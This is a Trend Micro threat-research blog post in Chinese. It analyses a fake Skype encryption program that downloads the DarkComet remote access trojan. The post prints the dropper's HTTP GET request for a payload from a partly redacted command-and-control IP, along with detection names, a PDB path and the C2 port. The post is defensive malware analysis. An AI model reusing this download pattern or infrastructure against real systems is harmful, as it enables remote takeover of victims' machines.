暗藏木马的假冒Skype加密软件
作者:趋势科技资深威胁研究员 Natt Villeneuve
CNN 的报导也侧面证明了有恶意软件正在通过 Skype 传播,这让我们想起另一起以前发现的,会利用Skype 执行的攻击。
趋势科技发现,有个网页宣称可以提供 Skype使用的加密软件。这个网页被托管在位于叙利亚的网站 {BLOCKED}encription.sytes.net 上,网站 IP 地址是 {BLOCKED}.{BLOCKED}.{BLOCKED}.0.28。这个地址和之前一些攻击所用的命令与控制服务器完全相同。网页上有个内嵌的 YouTube 视频,声称该软件来自“IT Security Lab(安全实验室)”,可以用来加密 Skype 的语音通讯。
如果用户上当下载该文件,随后即可获得一个据称可以对用户的 Skype 数据进行加密的程序。这个程序为Skype Encription v2.1.exe,已被趋势科技命名为 BKDR_METEO.HVN。分析后,我们发现没有任何证据表明该程序可以提供所宣称的加密功能。
这个文件中包含的一个字符串证明,文件是由“SyRiAnHaCkErS”所编写的:
C:\Users\SyRiAnHaCkErS\Desktop\test\final\final\obj\x86\Debug\SkypeEncription v 2.1.pdb
运行后,该软件会执行下列网络操作:
GET/SkypeEncription/Download/skype.exe HTTP/1.1
Host: {BLOCKED}.{BLOCKED}.0.28
Connection: Keep-Alive
该操作会下载名为skype.exe 的文件,而该文件已经被确定为BKDR_ZAPCHAST.HVN,实际上这就是恶意软件DarkComet 的 3.3 版,该软件会连接到 {BLOCKED}.{BLOCKED}.0.28这一 IP 地址的 771 端口。在趋势科技的测试环境中,通过对网络通讯进行重定向,确认这实际上就是 DarkComet。
一旦安装 BKDR_ZAPCHAST.HVN,攻击者就可以通过DarkComet 远程访问木马(RAT)获得被感染系统的完全控制权。关于 DarkComet 远程访问木马的功能已经在这里和这里介绍过了。
请注意,Skype本身就会使用 AES 加密技术对语音通讯和文字通讯内容进行加密,当然视频通话也受到该技术的保护。
趋势科技的用户无需担心,您已经可以通过趋势科技云计算安全技术获得妥善保护,完全可以检测并清理掉相关恶意软件,预防所有威胁。
@原文出处:FakeSkype Encryption Software Cloaks DarkComet Trojan
本文版权为趋势科技所有,对于非赢利网站或媒体转载请注明作者以及原文链接。谢谢合作!
爱趋势社区—下载/论坛/分享 http://www.iqushi.com
官方微博—拿礼品/分享最新IT资讯 http://t.sina.com.cn/trendcloud
趋势科技CEO:陈怡桦EvaChen的微博 http://weibo.com/evatrendmicro